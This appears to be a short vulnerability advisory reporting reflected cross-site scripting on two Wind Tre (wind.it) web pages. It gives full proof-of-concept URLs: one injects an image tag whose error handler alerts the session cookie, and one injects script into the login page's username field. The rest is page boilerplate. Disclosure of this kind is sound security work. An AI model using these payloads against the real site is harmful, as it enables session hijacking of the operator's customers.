Wind Tre S.P.A mobile operator is Vulnerable to Cross Site Scripting Attack

2019-07-24 / 2019-07-25

wind.it (AT)

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

Wind Tre S.P.A is vulnerable to Cross Site Scripting Attack
https://www.wind.it/windcode/wind/windgsa/proxy_ricerca.php?q=xxxrmgo0%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Ethpteoddgol&command=autosuggest&site=wind_assistenza&channel=wic&ie_browser=0&client=wind
https://windecare.wind.it/ecare/login?username=vul'%3balert(document.domain)%2f%2f656tckx4u&password=ggggggggggg&Ricordami=ON&from155=OK

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Wind Tre S.P.A mobile operator is Vulnerable to Cross Site Scripting Attack

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.